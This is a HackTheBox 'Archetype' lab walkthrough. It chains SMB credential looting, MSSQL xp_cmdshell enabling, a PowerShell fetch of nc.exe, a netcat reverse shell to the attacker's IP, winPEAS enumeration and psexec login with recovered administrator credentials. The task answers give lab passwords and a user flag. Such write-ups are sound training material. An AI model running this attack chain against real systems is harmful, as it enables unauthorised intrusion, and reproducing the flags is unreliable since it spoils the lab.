Archetype HackTheBox Walkthrough
Here in this walkthrough, I will be demonstrating the path or procedure to solve this box both according to the Walkthrough provided in HTB and some alternative methods to do the same process. If you guys wanna follow along here is the box link :
https://app.hackthebox.com/starting-point
Now Let’s Begin 🚀
Step 1 (Scanning) :
First, we will scan our target machine using Nmap to see what services are running.
nmap -sC -sV -A [Target_IP]We will get something like this as a result :
So we can conclude from here is :
* RPC on 135
* netBios-ssn (samba) on 139
* MsSql on 1433
Run SmbClient in order to get what is there. Use this command to access the main directories present on the server:
smbclient -N -L \\\\[Target_IP]\\We will get results as :
We can see that there is a backup folder here so let’s navigate to ‘backups’ and get the contents (in our case there is only one file here useful for us “prod.dtsConfig”) :
smbclient -N \\\\[Target_IP]\\backups
smb: \> ls
smb: \> get prod.dtsConfig
[IMP !] Now this file will be stored in our local machine in the same folder where our smbclient is running
Let’s Analyse our file -
From here we will get our password for MsSql so let’s copy it somewhere safe.
Password: M3g4c0rp123
User : Archetype/sql_svc
Step 2 :
Now let’s login to our MsSql client remotely but how do we do that here we will search on google and we would find a tool named “mssqlclient.py”. This tool will allow us to log in to our target’s MsSql server.
Download this tool :
1. git clone https://github.com/SecureAuthCorp/impacket.git
2. Navigate to the folder — cd impacket
3. pip3 install -r requirements.txt
4. python3 setup.py install
After installing let’s run this tool :
python3 /opt/impacket/examples/mssqlclient.py Archetype/sql_svc@[Target_IP] -windows-authEnter the password and voila we are now logged in
Now we logged in but what we can do here. So let’s research and find a way if can execute the command shell from our mssqlclient.py and here we found something :
xp_cmdshell let’s try this
EXEC xp_cmdshell 'net-user'But here we get an error. It seems like xp_cmdshell is not activated yet. So we need to know how to activate this, And Microsoft is here to help us again:
First, we need to check our Roles on the server :
SELECT is_srvrolemember('sysadmin');This will return us 1, which means true. So we can proceed -
Follow these steps :
EXECUTE sp_configure 'show advanced options',1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell',1;
RECONFIGURE;Now try running :
xp_cmdshell "whoami"Now it’s working and this command will return us “archetype/sql_svc”.
Step 3 (Stable shell):
Our shell is working but we won’t be executing our commands like this again so we will get a stable shell. Now let’s search and find something.
After some searching we found an article:
https://pentestwiki.org/academy/how-to-get-a-xp_cmdshell-reverse-shell/
We will follow the last method: xp_cmdshell with nc
- Here first we have to download nc.exe on our local system, which can be downloaded from the link: https://github.com/int0x33/nc.exe/blob/master/nc.exe
- After downloading let’s set up a python server on our machine in order to send the file to the target system.
python3 -m http.server// Keep in mind to run the server in the folder yout nc.exe file is present- We will use the following command to get the file on our target system:
xp_cmdshell "powershell.exe wget http://[Your_tun0_IP]:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"/*
we don't need the rest of the command because :
. we already are connected to sql
. we already logged in using correct credentials
*/- If our file is successfully transferred we will get something like this in our server instance
root@ip-10-10-204-169:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.102.63 - - [22/Feb/2022 09:12:04] "GET /nc.exe HTTP/1.1" 200 -- The next step is to execute the file in our target system for the reverse shell. So for that first, let’s set up our Netcat listener on our system:
nc -lvnp 4444- We will execute the following command in our target system
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe [Your_tun0_IP] 4444"And Voila!! we have our shell 🎉
Step 4 (Finding Our Flags and Privilege Escalation):
So we got our stable shell so our next step is to find the flags. So user flag is in the Dekstop folder and we can navigate to that folder :
cd \
cd Users
cd sql_svc
cd Desktop
type user.txtAnd we have our User Flag 🚩
Now next we have to find our Root flag. For that, we need to switch to Administrator and get the flag, but we can’t do it just like that because we need root permission to access the file from the Administrator.
Here comes Privilege Escalation
We need something that can tell us the weak points in the system so that we can exploit them and get the root access and we can’t do this manually because it will be a lengthy process upon searching we found something known as “Winpeas”
Winpeas is an extremely useful tool to enumerate the system for us and find weaknesses.
Now for running this tool we need to send it to our target system. Let’s do it then :
- Download Winpeas into our system using the link: https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
- Set up our python server
python3 -m http.server- Get our file in our target system. We need to switch to PowerShell because cmd.exe doesn’t have wget:
powershellwget http://[Your_tun0_IP]:8000/winPEASx64.exe -outfile winPEASx64.exe- Confirm the transfer as we did above when we were transferring “nc.exe”
- Now run the tool using the command: “./winPEASx64.exe”
- After running at the end we get some output as:
- Notice the file named “ConsoleHost_history.txt”. Let’s navigate to this file and see what’s in there.
cd \
cd Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
type ConsoleHost_history.txt
Here is our gift 🎁
User: administrator
Password: MEGACORP_4dm1n!!
Now we need a tool to log in as Administrator on our target PC and we cannot do it directly in our Windows Powershell as we do in the Linux system. There is a tool from our impacket named psexec.py which will help us.
- Kill the PowerShell and mssqlclient on our machine.
- Let’s use our tool:
python3 /opt/impacket/examples/psexec.py administrator@[Target_IP]- Here we have our Shell with Root Access
Now let’s navigate to our Administrator Desktop to claim our Root flag 🚩
we have PWNED the machine!!
Task Questions:
Task 1 : Which TCP port is hosting a database server?
> 1433Task 2 : What is the name of the non-Administrative share available over SMB?
> backupsTask 3 : What is the password identified in the file on the SMB share?
> M3g4c0rp123Task 4 : What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
> mssqlclient.pyTask 5 : What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
> xp_cmdshellTask 6 : What script can be used in order to search possible paths to escalate privileges on Windows hosts?
> winpeasTask 7 : What file contains the administrator’s password?
> ConsoleHost_history.txtTask 8 : Submit user flag
> 3e7b102e78218e935bf3f4951fec21a3Task 9: Submit the root flag
> Try to Find it yourself !! Best of Luck 😃
